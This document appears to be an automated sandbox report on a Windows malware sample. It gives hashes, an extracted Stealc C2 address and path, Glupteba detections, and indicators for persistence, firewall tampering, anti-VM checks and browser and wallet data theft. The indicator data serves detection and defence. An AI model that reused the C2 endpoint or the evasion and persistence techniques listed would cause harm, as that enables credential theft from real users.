Analysis
max time kernel: 149s
max time network: 145s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-03-2024 14:21
Static task: static1

General
Target: 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe
Size: 389KB
MD5: 56ab49c031367376bc8753b8bc2388da
SHA1: 16e1bdbeb0df52ce30481c374a45d4ccb98e1219
SHA256: 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d
SHA512: 4bb0e1fb041909ab685cf55017f4fad5981dfade35f181a5e436596941da75d61b4cde788e1d813fb4abee38373a50761d745f4329246c6a9c4a625971d7d8ff
SSDEEP: 12288:fgkkZ8m4E3qYGJ95Cj5BtcCuPHzVvd/FLobUk:v08zyqtouVLsUk

Malware Config
Extracted
Family: stealc
C2: http://185.172.128.209
url_path: /3cd2b41cbde8fc9c.php

Signatures
Glupteba payload 16 IoCs
Processes:
resource | yara_rule
behavioral1/memory/4640-67-0x0000000002F20000-0x000000000380B000-memory.dmp | family_glupteba
behavioral1/memory/2980-68-0x0000000002F50000-0x000000000383B000-memory.dmp | family_glupteba
behavioral1/memory/2980-69-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/4640-83-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/1352-145-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/4640-413-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/2980-415-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/1352-491-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/4640-515-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/2980-517-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/4640-585-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/1352-605-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/2980-842-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/6048-893-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/6092-894-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba
behavioral1/memory/6140-896-0x0000000000400000-0x0000000000ECD000-memory.dmp | family_glupteba

Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | aYoDWoALsh7fWmLZJgqz1ZSo.exe

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description | pid | Process | procid_target
PID 5084 created 2512 | 5084 | RegAsm.exe | 42

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | aYoDWoALsh7fWmLZJgqz1ZSo.exe

Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | Process
178 | 5972 | rundll32.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
pid | Process
5328 | netsh.exe
5160 | netsh.exe
4008 | netsh.exe

Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | aYoDWoALsh7fWmLZJgqz1ZSo.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | aYoDWoALsh7fWmLZJgqz1ZSo.exe

Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | MaKDbFZoKxsMGQUEadkOBsmF.exe
Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | Install.exe
Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | Install.exe
Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | un4.0.exe
Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | JKEGDHCFCA.exe
Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | leAODjb.exe

Drops startup file 11 IoCs
Processes:
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6C5vrw9HlmBbodwnSru7JCve.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nq6HrOPNQV3AaiTZ2ENszitk.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zdUBOSEBG9eSDmyFgN1uKQWG.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwi2TsGcdAGdwOcS1B3eh5H5.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rfMtcSilGcz9WSg5R9vEYI1Y.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26ZY1zErGGTZoLBKBy5Lpa8v.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M67GjMBrsbsHZTc6qTnNvMHQ.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8iwRl3OdyFG6LeZYMrXZXLBc.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sb771El5hpTNkkzOaJIpPwPM.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QPMwbWVY1JbuAE8Mag8boWCx.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYaLwPfN6vuiz6R1FwtbMxQK.bat | msbuild.exe

Executes dropped EXE 33 IoCs
Processes:
pid | Process
832 | MaKDbFZoKxsMGQUEadkOBsmF.exe
4640 | O8M8v9erpd6p9TZ5cZU71Tag.exe
2980 | rfVcCs84JgkadF5csIFA6eOA.exe
4912 | PPShZLAKQ6L4xgy8fCGXP1YJ.exe
1464 | PBCfG3wrCyp60tNkAdjwRCEQ.exe
1352 | LmaiU21tMWhBuhG73TdiEsIZ.exe
856 | un4.0.exe
4232 | un4.1.exe
440 | aYoDWoALsh7fWmLZJgqz1ZSo.exe
1880 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
2260 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
4424 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
3096 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
3940 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
456 | EwbpoERL2KXj9VGzo9QBTWpU.exe
5036 | Install.exe
4912 | Install.exe
5760 | CP1pPdaYSdNNSuryt7kujhW8.exe
5996 | Install.exe
6048 | O8M8v9erpd6p9TZ5cZU71Tag.exe
6092 | rfVcCs84JgkadF5csIFA6eOA.exe
6140 | LmaiU21tMWhBuhG73TdiEsIZ.exe
3536 | Install.exe
4540 | Assistant_108.0.5067.20_Setup.exe_sfx.exe
4136 | assistant_installer.exe
4440 | assistant_installer.exe
5544 | csrss.exe
5620 | JKEGDHCFCA.exe
5724 | injector.exe
2464 | windefender.exe
5296 | windefender.exe
5616 | GYSQssI.exe
5612 | leAODjb.exe

Loads dropped DLL 12 IoCs
Processes:
pid | Process
1880 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
2260 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
4424 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
3096 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
3940 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
856 | un4.0.exe
856 | un4.0.exe
4136 | assistant_installer.exe
4136 | assistant_installer.exe
4440 | assistant_installer.exe
4440 | assistant_installer.exe
5972 | rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
behavioral1/files/0x00090000000231fb-198.dat | themida
behavioral1/memory/440-257-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp | themida
behavioral1/memory/440-259-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp | themida
behavioral1/memory/440-275-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp | themida
behavioral1/memory/440-271-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp | themida
behavioral1/memory/440-283-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp | themida
behavioral1/memory/440-281-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp | themida
behavioral1/memory/440-262-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp | themida
behavioral1/memory/440-504-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp | themida

Processes:
resource | yara_rule
behavioral1/files/0x00080000000231ef-167.dat | upx
behavioral1/memory/4232-502-0x0000000000400000-0x0000000000930000-memory.dmp | upx
behavioral1/memory/4232-675-0x0000000000400000-0x0000000000930000-memory.dmp | upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 4 IoCs
Processes:
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | rfVcCs84JgkadF5csIFA6eOA.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | LmaiU21tMWhBuhG73TdiEsIZ.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | O8M8v9erpd6p9TZ5cZU71Tag.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | aYoDWoALsh7fWmLZJgqz1ZSo.exe

Drops Chrome extension 2 IoCs
Processes:
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | leAODjb.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | leAODjb.exe

Drops desktop.ini file(s) 1 IoCs
Processes:
description | ioc | Process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | leAODjb.exe

Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | Process
File opened (read-only) | \??\D: | Z1z6oEWmHWh3S9fVhayDhyvW.exe
File opened (read-only) | \??\F: | Z1z6oEWmHWh3S9fVhayDhyvW.exe
File opened (read-only) | \??\D: | Z1z6oEWmHWh3S9fVhayDhyvW.exe
File opened (read-only) | \??\F: | Z1z6oEWmHWh3S9fVhayDhyvW.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
Processes:
description | ioc | Process
File opened for modification | \??\WinMonFS | csrss.exe

Drops file in System32 directory 46 IoCs
Processes:
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | leAODjb.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | leAODjb.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | leAODjb.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | GYSQssI.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | leAODjb.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | aYoDWoALsh7fWmLZJgqz1ZSo.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | aYoDWoALsh7fWmLZJgqz1ZSo.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | aYoDWoALsh7fWmLZJgqz1ZSo.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | leAODjb.exe
File opened for modification | C:\Windows\System32\GroupPolicy | aYoDWoALsh7fWmLZJgqz1ZSo.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | GYSQssI.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | leAODjb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | leAODjb.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid | Process
440 | aYoDWoALsh7fWmLZJgqz1ZSo.exe

Suspicious use of SetThreadContext 2 IoCs
Processes:
description | pid | Process | procid_target
PID 4204 set thread context of 1512 | 4204 | 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe | 87
PID 4912 set thread context of 5084 | 4912 | PPShZLAKQ6L4xgy8fCGXP1YJ.exe | 99

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | O8M8v9erpd6p9TZ5cZU71Tag.exe
File opened (read-only) | \??\VBoxMiniRdrDN | LmaiU21tMWhBuhG73TdiEsIZ.exe
File opened (read-only) | \??\VBoxMiniRdrDN | rfVcCs84JgkadF5csIFA6eOA.exe

Drops file in Program Files directory 14 IoCs
Processes:
description | ioc | Process
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | leAODjb.exe
File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\NhgXboc.dll | leAODjb.exe
File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml | leAODjb.exe
File created | C:\Program Files (x86)\mVqQIGUXDOgrC\gvVUloZ.dll | leAODjb.exe
File created | C:\Program Files (x86)\gbPxNkbXHfUn\cqdpDDd.dll | leAODjb.exe
File created | C:\Program Files (x86)\yvWovCiVU\amDviS.dll | leAODjb.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | leAODjb.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | leAODjb.exe
File created | C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml | leAODjb.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | leAODjb.exe
File created | C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml | leAODjb.exe
File created | C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml | leAODjb.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | leAODjb.exe
File created | C:\Program Files (x86)\LCifMpYymZWU2\ZadmzDkveihSi.dll | leAODjb.exe

Drops file in Windows directory 13 IoCs
Processes:
description | ioc | Process
File opened for modification | C:\Windows\rss | rfVcCs84JgkadF5csIFA6eOA.exe
File created | C:\Windows\rss\csrss.exe | rfVcCs84JgkadF5csIFA6eOA.exe
File created | C:\Windows\rss\csrss.exe | O8M8v9erpd6p9TZ5cZU71Tag.exe
File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | schtasks.exe
File opened for modification | C:\Windows\windefender.exe | csrss.exe
File created | C:\Windows\windefender.exe | csrss.exe
File opened for modification | C:\Windows\rss | LmaiU21tMWhBuhG73TdiEsIZ.exe
File created | C:\Windows\rss\csrss.exe | LmaiU21tMWhBuhG73TdiEsIZ.exe
File opened for modification | C:\Windows\rss | O8M8v9erpd6p9TZ5cZU71Tag.exe
File opened for modification | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | schtasks.exe
File created | C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job | schtasks.exe
File created | C:\Windows\Tasks\eGwAoTnpAObQfPU.job | schtasks.exe
File created | C:\Windows\Tasks\FTXCzbcEvROqagNdd.job | schtasks.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | Process
5448 | sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 6 IoCs
Processes:
pid | pid_target | Process | procid_target
1208 | 4912 | WerFault.exe | 95
4948 | 832 | WerFault.exe | 92
100 | 5084 | WerFault.exe | 99
4480 | 5084 | WerFault.exe | 99
4856 | 1464 | WerFault.exe | 98
5668 | 856 | WerFault.exe | 102

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | un4.0.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | un4.0.exe

Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | Process
5032 | schtasks.exe
5532 | schtasks.exe
1876 | schtasks.exe
5548 | schtasks.exe
3176 | schtasks.exe
3776 | schtasks.exe
5880 | schtasks.exe
4064 | schtasks.exe
2492 | schtasks.exe
1028 | schtasks.exe
5800 | schtasks.exe
5468 | schtasks.exe
2488 | schtasks.exe
5648 | schtasks.exe
5736 | schtasks.exe
5396 | schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe

Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | Process
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" | LmaiU21tMWhBuhG73TdiEsIZ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" | windefender.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | LmaiU21tMWhBuhG73TdiEsIZ.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" | O8M8v9erpd6p9TZ5cZU71Tag.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | O8M8v9erpd6p9TZ5cZU71Tag.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | LmaiU21tMWhBuhG73TdiEsIZ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | O8M8v9erpd6p9TZ5cZU71Tag.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | LmaiU21tMWhBuhG73TdiEsIZ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
